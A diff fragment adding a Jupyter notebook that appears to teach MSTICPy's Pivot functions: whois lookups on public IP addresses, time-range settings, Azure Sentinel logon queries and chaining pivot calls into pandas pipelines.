+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>[{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>65.52.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2001-02-14</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>[{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>3598</td>\n",
+       "      <td>131.107.0.0/16</td>\n",
+       "      <td>US</td>\n",
+       "      <td>1988-11-11</td>\n",
+       "      <td>MICROSOFT-CORP-AS, US</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>[{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>13.64.0.0/11</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-03-26</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>[{'cidr': '13.64.0.0/11, 13.96.0.0/13, 13.104.0.0/14', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   nir asn_registry    asn         asn_cidr asn_country_code    asn_date  \\\n",
+       "0  NaN         arin  15169  172.217.15.0/24               US  2012-04-16   \n",
+       "1  NaN         arin   8075     40.80.0.0/12               US  2015-02-23   \n",
+       "2  NaN         arin   8075     20.36.0.0/14               US  2017-10-18   \n",
+       "3  NaN         arin   8075     23.96.0.0/14               US  2013-06-18   \n",
+       "4  NaN         arin   8075     65.52.0.0/14               US  2001-02-14   \n",
+       "5  NaN         arin   3598   131.107.0.0/16               US  1988-11-11   \n",
+       "6  NaN          NaN    NaN              NaN              NaN         NaN   \n",
+       "7  NaN          NaN    NaN              NaN              NaN         NaN   \n",
+       "8  NaN         arin   8075     13.64.0.0/11               US  2015-03-26   \n",
+       "\n",
+       "                   asn_description            query  \\\n",
+       "0                       GOOGLE, US    172.217.15.99   \n",
+       "1  MICROSOFT-CORP-MSN-AS-BLOCK, US     40.85.232.64   \n",
+       "2  MICROSOFT-CORP-MSN-AS-BLOCK, US     20.38.98.100   \n",
+       "3  MICROSOFT-CORP-MSN-AS-BLOCK, US      23.96.64.84   \n",
+       "4  MICROSOFT-CORP-MSN-AS-BLOCK, US     65.55.44.108   \n",
+       "5            MICROSOFT-CORP-AS, US  131.107.147.209   \n",
+       "6                              NaN              NaN   \n",
+       "7                              NaN              NaN   \n",
+       "8  MICROSOFT-CORP-MSN-AS-BLOCK, US     13.82.152.48   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '172.217.0.0/16', 'name': 'GOOGLE', 'handle': 'NET-172-217-0-0-1', 'range': '172.217.0...   \n",
+       "1  [{'cidr': '40.80.0.0/12, 40.124.0.0/16, 40.74.0.0/15, 40.76.0.0/14, 40.120.0.0/14, 40.125.0.0/17...   \n",
+       "2  [{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.34.0.0/15, 20.36.0.0/14, 20.64.0.0/10, 20.40.0.0/13, ...   \n",
+       "3  [{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....   \n",
+       "4  [{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...   \n",
+       "5  [{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...   \n",
+       "6                                                                                                  NaN   \n",
+       "7                                                                                                  NaN   \n",
+       "8  [{'cidr': '13.64.0.0/11, 13.96.0.0/13, 13.104.0.0/14', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...   \n",
+       "\n",
+       "   raw  referral  raw_referral  \n",
+       "0  NaN       NaN           NaN  \n",
+       "1  NaN       NaN           NaN  \n",
+       "2  NaN       NaN           NaN  \n",
+       "3  NaN       NaN           NaN  \n",
+       "4  NaN       NaN           NaN  \n",
+       "5  NaN       NaN           NaN  \n",
+       "6  NaN       NaN           NaN  \n",
+       "7  NaN       NaN           NaN  \n",
+       "8  NaN       NaN           NaN  "
+      ]
+     },
+     "execution_count": 30,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "IpAddress.util.whois(ip_df, column=\"ip\")  # correct"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "> Note: for most functions you can ignore the parameter\n",
+    "name and just specify it as a positional parameter.\n",
+    "You can also use the original parameter name of the underlying\n",
+    "function or the placeholder name \"value\".\n",
+    "\n",
+    "The following are all equivalent:\n",
+    "```python\n",
+    "IpAddress.util.ip_type(ip_list)\n",
+    "IpAddress.util.ip_type(ip_str=ip_list)\n",
+    "IpAddress.util.ip_type(value=ip_list)\n",
+    "IpAddress.util.ip_type(data=ip_list)\n",
+    "```\n",
+    "\n",
+    "When passing both a DataFrame and column name use:\n",
+    "```python\n",
+    "IpAddress.util.ip_type(data=ip_df, column=\"col_name\")\n",
+    "```\n",
+    "You can also pass an entity instance of an entity\n",
+    "as a input parameter. The pivot code knows which attribute\n",
+    "or attributes of an entity will provider the input value."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 31,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "             ip  result\n",
+       "0  40.85.232.64  Public"
+      ]
+     },
+     "execution_count": 31,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ip_entity = IpAddress(Address=\"40.85.232.64\")\n",
+    "IpAddress.util.ip_type(ip_entity)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Iterable/DataFrame inputs and single-value functions\n",
+    "\n",
+    "Many of the underlying functions only accept single values\n",
+    "as inputs. Examples of these are the data query functions - typically\n",
+    "they expect a single host name, IP address, etc.\n",
+    "\n",
+    "Pivot knows about the type of parameters that the function accepts.\n",
+    "It will adjust the input to match the expectations of the underlying\n",
+    "function. If a list or DataFrame is passed as input to a single-value\n",
+    "function Pivot will split the input and call the function once for\n",
+    "each value. It then combines the output into a single DataFrame\n",
+    "before returning the results. \n",
+    "\n",
+    "You can read a bit more about how this is done in the Appendix TODO"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Data queries - where does the time range come from?\n",
+    "\n",
+    "The Pivot class has a buit-in time range. This is used by\n",
+    "default for all queries. Don't worry - you can change it easily"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 32,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "TimeStamp(start=2021-03-10 18:33:43.314239, end=2021-03-11 18:33:43.314239, period=-1 day, 0:00:00)"
+      ]
+     },
+     "execution_count": 32,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Pivot.current.timespan"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can edit the time range interactively"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 33,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "57a1ffee1b0e4ec7be8277ccb7d17490",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set time range for pivot functions.</h4>'), HBox(children=(DatePicker(value=dat…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "Pivot.current.edit_query_time()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Or by setting the timespan property directly"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 34,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.common.timespan import TimeSpan\n",
+    "# TimeSpan accepts datetimes or datestrings\n",
+    "timespan = TimeSpan(start=\"02/01/2021\", end=\"02/15/2021\")\n",
+    "Pivot.current.timespan = timespan"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "In an upcoming release there is also a convenience function\n",
+    "for setting the time directly with Python datetimes or date strings\n",
+    "> <b><p style=\"color:red\">Warning:</p></b> post-0.9.0 functionality</br>\n",
+    "> This will throw and error in v0.9.0 of MSTICPy"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 35,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "Pivot.current.set_timespan(start=\"2020-02-06 03:00:00\", end=\"2021-02-15 01:42:42\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can also override the built-in time settings by specifying\n",
+    "`start` and `end` as parameters."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 36,
+   "metadata": {},
+   "outputs": [
+    {
+     "ename": "NameError",
+     "evalue": "name 'dt1' is not defined",
+     "output_type": "error",
+     "traceback": [
+      "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+      "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+      "\u001b[1;32m<ipython-input-36-a726e25f79ba>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mHost\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mAzureSentinel\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mSecurityAlert_list_related_alerts\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mhost_name\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;34m\"victim00\"\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mstart\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mdt1\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mend\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mdt2\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+      "\u001b[1;31mNameError\u001b[0m: name 'dt1' is not defined"
+     ]
+    }
+   ],
+   "source": [
+    "dt1 = Pivot.current.timespan.start\n",
+    "dt2 = Pivot.current.timespan.end\n",
+    "Host.AzureSentinel.SecurityAlert_list_related_alerts(host_name=\"victim00\", start=dt1, end=dt2)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Supplying extra parameters\n",
+    "\n",
+    "The Pivot layer will pass any unused keyword parameters to the\n",
+    "underlying function. This *does not* usually apply to positional parameters -\n",
+    "if you want parameters to get to the function, you have to name them\n",
+    "explicitly.\n",
+    "In this example the `add_query_items` parameter is passed to the underlying\n",
+    "query function"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>LogonType</th>\n",
+       "      <th>count_</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>5</td>\n",
+       "      <td>21650</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>3</td>\n",
+       "      <td>6808</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>4</td>\n",
+       "      <td>9426</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>2</td>\n",
+       "      <td>109</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>10</td>\n",
+       "      <td>44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>0</td>\n",
+       "      <td>7</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>9</td>\n",
+       "      <td>8</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   LogonType  count_\n",
+       "0          5   21650\n",
+       "1          3    6808\n",
+       "2          4    9426\n",
+       "3          2     109\n",
+       "4         10      44\n",
+       "5          0       7\n",
+       "6          9       8"
+      ]
+     },
+     "execution_count": 37,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.Host.AzureSentinel.SecurityEvent_list_host_logons(\n",
+    "    host_name=\"victimPc\",\n",
+    "    add_query_items=\"| summarize count() by LogonType\"\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Pivot Pipelines\n",
+    "\n",
+    "Because all pivot functions accept DataFrames as input\n",
+    "and produce DataFrames as output, it means that it is possible\n",
+    "to chain pivot functions into a pipeline.\n",
+    "\n",
+    "### Joining input to output\n",
+    "You can join the input to the output. This usually only makes sense\n",
+    "when the input is a DataFrame. It\n",
+    "lets you keep the previously accumumated results and tag on the\n",
+    "additional columns produced by the pivot function you are calling.\n",
+    "\n",
+    "The `join` parameter supports \"inner\", \"left\", \"right\" and \"outer\"\n",
+    "joins (be careful with the latter though!)\n",
+    "See [pivot joins documentation](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html#joining-input-to-output-data)\n",
+    "\n",
+    "Although joining is useful in pipelines you can use it on\n",
+    "any function whether in a pipeline or not."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>idx</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>type</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>query</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>referral</th>\n",
+       "      <th>raw_referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>0</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>15169</td>\n",
+       "      <td>172.217.15.0/24</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2012-04-16</td>\n",
+       "      <td>GOOGLE, US</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>[{'cidr': '172.217.0.0/16', 'name': 'GOOGLE', 'handle': 'NET-172-217-0-0-1', 'range': '172.217.0...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>40.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-02-23</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>[{'cidr': '40.80.0.0/12, 40.124.0.0/16, 40.74.0.0/15, 40.76.0.0/14, 40.120.0.0/14, 40.125.0.0/17...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.36.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>[{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.34.0.0/15, 20.36.0.0/14, 20.64.0.0/10, 20.40.0.0/13, ...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>23.96.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2013-06-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>[{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>4</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>65.52.0.0/14</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2001-02-14</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>[{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>5</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>3598</td>\n",
+       "      <td>131.107.0.0/16</td>\n",
+       "      <td>US</td>\n",
+       "      <td>1988-11-11</td>\n",
+       "      <td>MICROSOFT-CORP-AS, US</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>[{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>8</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>13.64.0.0/11</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-03-26</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>[{'cidr': '13.64.0.0/11, 13.96.0.0/13, 13.104.0.0/14', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   idx               ip    type  nir asn_registry    asn         asn_cidr  \\\n",
+       "0    0    172.217.15.99  Public  NaN         arin  15169  172.217.15.0/24   \n",
+       "1    1     40.85.232.64  Public  NaN         arin   8075     40.80.0.0/12   \n",
+       "2    2     20.38.98.100  Public  NaN         arin   8075     20.36.0.0/14   \n",
+       "3    3      23.96.64.84  Public  NaN         arin   8075     23.96.0.0/14   \n",
+       "4    4     65.55.44.108  Public  NaN         arin   8075     65.52.0.0/14   \n",
+       "5    5  131.107.147.209  Public  NaN         arin   3598   131.107.0.0/16   \n",
+       "6    8     13.82.152.48  Public  NaN         arin   8075     13.64.0.0/11   \n",
+       "\n",
+       "  asn_country_code    asn_date                  asn_description  \\\n",
+       "0               US  2012-04-16                       GOOGLE, US   \n",
+       "1               US  2015-02-23  MICROSOFT-CORP-MSN-AS-BLOCK, US   \n",
+       "2               US  2017-10-18  MICROSOFT-CORP-MSN-AS-BLOCK, US   \n",
+       "3               US  2013-06-18  MICROSOFT-CORP-MSN-AS-BLOCK, US   \n",
+       "4               US  2001-02-14  MICROSOFT-CORP-MSN-AS-BLOCK, US   \n",
+       "5               US  1988-11-11            MICROSOFT-CORP-AS, US   \n",
+       "6               US  2015-03-26  MICROSOFT-CORP-MSN-AS-BLOCK, US   \n",
+       "\n",
+       "             query  \\\n",
+       "0    172.217.15.99   \n",
+       "1     40.85.232.64   \n",
+       "2     20.38.98.100   \n",
+       "3      23.96.64.84   \n",
+       "4     65.55.44.108   \n",
+       "5  131.107.147.209   \n",
+       "6     13.82.152.48   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '172.217.0.0/16', 'name': 'GOOGLE', 'handle': 'NET-172-217-0-0-1', 'range': '172.217.0...   \n",
+       "1  [{'cidr': '40.80.0.0/12, 40.124.0.0/16, 40.74.0.0/15, 40.76.0.0/14, 40.120.0.0/14, 40.125.0.0/17...   \n",
+       "2  [{'cidr': '20.128.0.0/16, 20.33.0.0/16, 20.34.0.0/15, 20.36.0.0/14, 20.64.0.0/10, 20.40.0.0/13, ...   \n",
+       "3  [{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....   \n",
+       "4  [{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...   \n",
+       "5  [{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...   \n",
+       "6  [{'cidr': '13.64.0.0/11, 13.96.0.0/13, 13.104.0.0/14', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...   \n",
+       "\n",
+       "   raw  referral  raw_referral  \n",
+       "0  NaN       NaN           NaN  \n",
+       "1  NaN       NaN           NaN  \n",
+       "2  NaN       NaN           NaN  \n",
+       "3  NaN       NaN           NaN  \n",
+       "4  NaN       NaN           NaN  \n",
+       "5  NaN       NaN           NaN  \n",
+       "6  NaN       NaN           NaN  "
+      ]
+     },
+     "execution_count": 38,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.util.whois(ip_df, column=\"ip\", join=\"inner\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<hr>\n",
+    "\n",
+    "### Pipelines \n",
+    "\n",
+    "Pivot pipelines are implemented pandas customr accessors.\n",
+    "Read more about [Extending pandas here](https://pandas.pydata.org/pandas-docs/stable/development/extending.html)\n",
+    "\n",
+    "When you load Pivot it adds the `mp_pivot` accessor. This\n",
+    "appears as an attribute to DataFrames.\n",
+    "\n",
+    "```python\n",
+    ">>> ips_df.mp_pivot\n",
+    "<msticpy.datamodel.pivot_pd_accessor.PivotAccessor at 0x275754e2208>\n",
+    "```\n",
+    "\n",
+    "The main pipelining function `run` is a method of `mp_pivot`.\n",
+    "`run` requires two parameters - the pivot function to run and\n",
+    "the column to use as input. See [mp_pivot.run documentation](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html#mp-pivot-run)\n",
+    "\n",
+    "Here is an example of using it to call 4 pivot functions, each\n",
+    "using the output of the previous function as input and using\n",
+    "the `join` parameter to accumulate the results from each\n",
+    "stage.\n",
+    "\n",
+    "Let's step through it line by line.\n",
+    "1. The whole thing is surrounded by a pair of parentheses - this is just\n",
+    "   to let us split the whole expression over multiple lines without\n",
+    "   Python complaining.\n",
+    "2. Next we have `ips_df` - this is just the starting DataFrame, our input data.\n",
+    "3. Next we call the `mp_pivot.run()` accessor method on this dataframe.\n",
+    "   We pass it the pivot function that we want to run and the input column name.\n",
+    "   This column name is the column in ips_df where our input IP addresses are.\n",
+    "   We've also specified an `join` type of inner. In this case the join type doesn't\n",
+    "   really matter since we know we get exactly one output row for every input row.\n",
+    "4. We're using the pandas `query` function to filter out unwanted entries\n",
+    "   from the previous stage. In this case we only want Public IP addresses. \n",
+    "   This illustrates that you can intersperse standard pandas functions\n",
+    "   in the same pipeline. We could have also added a column selector expression\n",
+    "   ([[\"col1\", \"col2\"...]]) if we wanted to filter the columns passed to the \n",
+    "   next stage\n",
+    "5. We are calling a further pivot function - `whois`. Remember the \"column\" parameter\n",
+    "   always refers to the input column, i.e. the column from previous stage\n",
+    "   that we want to use in this stage.\n",
+    "6. We are calling `geoloc` to get geo location details joining with a left\n",
+    "   join - this preserves the input data rows and adds null columns in any cases\n",
